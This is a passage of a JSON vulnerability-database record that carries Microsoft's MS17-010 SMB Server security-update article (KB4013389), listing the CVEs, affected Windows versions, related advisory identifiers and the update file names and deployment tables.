"EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-09-11T12:33:22", "value": 6.5, "vector": "NONE"}}, "hash": "e311164474c6687c491096ccffc30dca15864b3dcf95d35b812da6fc9752276a", "history": [], "href": "https://support.microsoft.com/en-us/help/4013389/", "id": "KB4013389", "immutableFields": [], "kb": "KB4013389", "lastseen": "2019-09-11T12:33:22", "modified": "2017-03-14T17:40:20", "mscve": "", "msfamily": "", "msimpact": "Remote Code Execution", "msplatform": "", "msproducts": ["14135", "13230", "14478", "14562", "14113", "13228", "11721", "14210", "15514", "17381", "11728", "19589", "11740", "15511", "16735", "11733", "17508", "11719", "14492", "16710", "17651", "17654", "16730", "19759", "13236", "14496", "14490", "14139", "13233", "14501", "14440", "17360", "18472", "19756", "14136", "16625", "13234", "19754", "17657", "14503", "17344", "18875", "14131", "17542", "11708"], "msrc": "MS17-010", "msseverity": "Critical", "objectVersion": "1.5", "parentseeds": [], "primarySupportAreaPath": [{"id": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "name": "Windows Server 2016", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "published": "2017-03-11T21:22:44", "references": [], "reporter": "Microsoft", "superseeds": ["KB2508429", "KB896422", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB2536275", "KB957095", "KB3177186", "KB958687", "KB975517"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dc52833c-eac7-25b7-b942-b2dfcfbace09", "name": "Windows Server 2012 R2 Essentials", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "name": "Windows Server 2008 R2 Datacenter", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "12db0355-c78b-b1b8-0c13-671906e0652d", "name": "Windows Server 2016 Essentials", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "6a967721-27d9-bd5f-9029-99ca5f0436dd", "name": "Windows Server 2012 R2 Foundation", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "e2b2a040-324c-43bf-447c-75aab15e2570", "name": "Windows Server 2012 Foundation", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "name": "Windows Server 2012 R2 Datacenter", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "1b3bc777-c681-e378-d422-eb618baa26f9", "name": "Windows Server 2012 Essentials", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "670009af-2bc1-fa29-d4a5-99c02e923013", "name": "Windows Server 2008 R2 Standard", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "name": "Windows Server 2012 R2 Standard", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "8540b382-5304-d506-ece2-a936dd11d66e", "name": "Windows 10, version 1511", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "name": "Windows Server 2016 Standard", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "ceefced2-0d6f-a4bd-50d6-875c871b8250", "name": "Windows Server 2012 Datacenter", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "4af945c2-8a39-6b82-777b-5067ce2c9216", "name": "Windows Server 2012 Standard", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "86630540-cb68-b324-567b-e197838cd28b", "name": "Windows RT 8.1", "parent": "13d0da43-f4d6-9f8e-d090-ed3881084c6e", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "b5011041-7904-59f1-97ca-53b1da5812fb", "name": "Windows 7 Starter", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "name": "Windows 10", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "2994eca6-696c-b523-20de-40b02211bb3b", "name": "Windows Server 2008 R2 Enterprise", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "32719e08-ef7b-a697-0697-ec02d753dbb5", "name": "Windows Server 2008 R2 Web Edition", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "name": "Windows Server 2008 R2 Foundation", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "e51103b3-9b99-948e-95ff-fd63b48f329b", "name": "Windows 10, version 1607", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "e51103b3-9b99-948e-95ff-fd63b48f329b", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "6f18bf60-d0f1-8298-413b-89f6e8170528", "670009af-2bc1-fa29-d4a5-99c02e923013", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "32719e08-ef7b-a697-0697-ec02d753dbb5", "e2b2a040-324c-43bf-447c-75aab15e2570", "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "1b3bc777-c681-e378-d422-eb618baa26f9", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "b5011041-7904-59f1-97ca-53b1da5812fb", "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "8540b382-5304-d506-ece2-a936dd11d66e", "f62ed778-6986-d76e-c007-40a28315ffbf", "86630540-cb68-b324-567b-e197838cd28b", "928d79ba-72eb-762f-39be-122173e95922", "12db0355-c78b-b1b8-0c13-671906e0652d", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "ceefced2-0d6f-a4bd-50d6-875c871b8250", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "4af945c2-8a39-6b82-777b-5067ce2c9216", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "2994eca6-696c-b523-20de-40b02211bb3b", "417baa75-0c45-df0a-8e65-960580d94f42", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "dc52833c-eac7-25b7-b942-b2dfcfbace09", "2b2eeb95-d89c-6614-0db5-88f09133ede6", "6a967721-27d9-bd5f-9029-99ca5f0436dd"], "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "type": "mskb", "viewCount": 33}, "differentElements": ["supportAreaPathNodes"], "edition": 1, "lastseen": "2019-09-11T12:33:22"}, {"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>indows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of 